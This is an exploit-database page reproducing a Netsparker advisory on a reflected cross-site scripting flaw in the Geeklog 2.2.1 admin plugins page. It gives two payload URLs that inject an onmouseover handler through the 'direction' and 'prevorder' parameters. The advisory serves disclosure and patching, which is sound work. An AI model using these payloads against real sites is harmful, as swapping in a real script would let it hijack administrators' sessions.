Exploit for Geeklog 2.2.1 Cross Site Scripting

Name: Exploit for Geeklog 2.2.1 Cross Site Scripting
Rating: 5 (87 reviews)

2020-04-27 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:157395
Information  
--------------------  
  
Advisory by Netsparker  
Name: Cross-Site Scripting Vulnerability in Geeklog  
Affected Software: Geeklog  
Affected Versions: 2.2.1  
Vendor Homepage: https://www.geeklog.net/  
Vulnerability Type: Cross-Site Scripting  
Severity: Important  
Status: Fixed  
CVSS Score (3.0): 7.4 (High)  
Netsparker Advisory Reference: NS-20-001  
  
Technical Details  
--------------------  
  
URL :  
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x  
"%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load  
Parameter Name : direction  
Parameter Type : GET  
Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22  
  
URL :  
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x  
"%20onmouseover=netsparker(0x019E05)%20x="  
Parameter Name : prevorder  
Parameter Type : GET  
Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/